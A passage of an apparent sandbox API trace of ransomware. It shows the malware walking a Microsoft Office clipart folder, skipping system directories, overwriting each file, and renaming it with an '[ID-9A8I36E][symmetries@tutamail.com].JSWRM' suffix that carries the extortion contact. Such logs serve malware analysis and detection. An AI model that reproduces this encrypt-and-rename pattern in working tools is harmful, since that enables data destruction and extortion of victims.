Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00135_.WMF", cAlternateFileName="")) returned 1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2=".") returned 1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="..") returned 1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="...") returned 1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="windows") returned -1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="recovery") returned -1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="perflogs") returned -1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="documents and settings") returned -1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="system volume information") returned -1 [0075.468] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="msocache") returned -1 [0075.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00135_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00135_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00135_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0075.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00135_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00135_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00135_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0075.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.469] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1044) returned 1 [0075.469] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x410) returned 0x203550 [0075.469] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x410, lpOverlapped=0x0) returned 1 [0075.471] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.471] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x410, lpOverlapped=0x0) returned 1 [0075.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0075.471] CloseHandle (hObject=0x460) returned 1 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0075.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0075.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0075.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0075.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.472] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x876, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00136_.WMF", cAlternateFileName="")) returned 1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2=".") returned 1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="..") returned 1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="...") returned 1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="windows") returned -1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="recovery") returned -1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="perflogs") returned -1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="documents and settings") returned -1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="system volume information") returned -1 [0075.472] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="msocache") returned -1 [0075.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00136_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00136_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00136_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00136_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00136_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00136_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.473] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2166) returned 1 [0075.473] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x870) returned 0x23fc98 [0075.473] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x870, lpOverlapped=0x0) returned 1 [0075.474] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.474] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x870, lpOverlapped=0x0) returned 1 [0075.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.475] CloseHandle (hObject=0x460) returned 1 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0075.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0075.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0075.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0075.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.475] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.476] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00145_.WMF", cAlternateFileName="")) returned 1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2=".") returned 1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="..") returned 1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="...") returned 1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="windows") returned -1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="recovery") returned -1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="perflogs") returned -1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="documents and settings") returned -1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="system volume information") returned -1 [0075.476] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="msocache") returned -1 [0075.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00145_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00145_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00145_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0075.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00145_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00145_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00145_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.477] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1712) returned 1 [0075.477] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b0) returned 0x23fc98 [0075.477] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x6b0, lpOverlapped=0x0) returned 1 [0075.478] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.478] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x6b0, lpOverlapped=0x0) returned 1 [0075.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.478] CloseHandle (hObject=0x460) returned 1 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0075.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0075.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.479] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.480] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00174_.WMF", cAlternateFileName="")) returned 1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2=".") returned 1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="..") returned 1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="...") returned 1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="windows") returned -1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="recovery") returned -1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="perflogs") returned -1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="documents and settings") returned -1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="system volume information") returned -1 [0075.480] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="msocache") returned -1 [0075.480] 